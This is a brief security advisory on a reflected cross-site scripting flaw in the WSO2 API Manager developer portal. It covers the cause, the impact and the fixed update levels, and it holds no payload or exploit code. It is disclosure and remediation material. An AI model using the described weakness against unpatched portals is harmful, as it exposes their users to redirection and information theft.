WSO2 API Manager Reflected Cross-Site Scripting Vulnerability

A reflected cross-site scripting vulnerability has been identified in the WSO2 API Manager developer portal. This issue arises because the portal does not properly validate user input or encode output, allowing malicious actors to inject script content that is executed in the context of the user's browser. Exploitation of this vulnerability could lead to redirection to a malicious website, unauthorized changes to the web page's user interface, or retrieval of information from the browser. However, session hijacking is not possible, as sensitive session cookies are protected by the httpOnly flag.

Impact

Exploitation of this vulnerability allows for reflected cross-site scripting, where injected scripts are executed in the context of the user's browser. This could result in redirection to malicious websites, unauthorized UI modifications, or access to browser-stored information. However, session hijacking is not feasible due to the httpOnly flag on sensitive cookies.

Remediation

WSO2 API Manager users should update to version 4.1.0 (update level 187), 4.0.0 (update level 293), 3.2.1 (update level 32), or 3.2.0 (update level 408).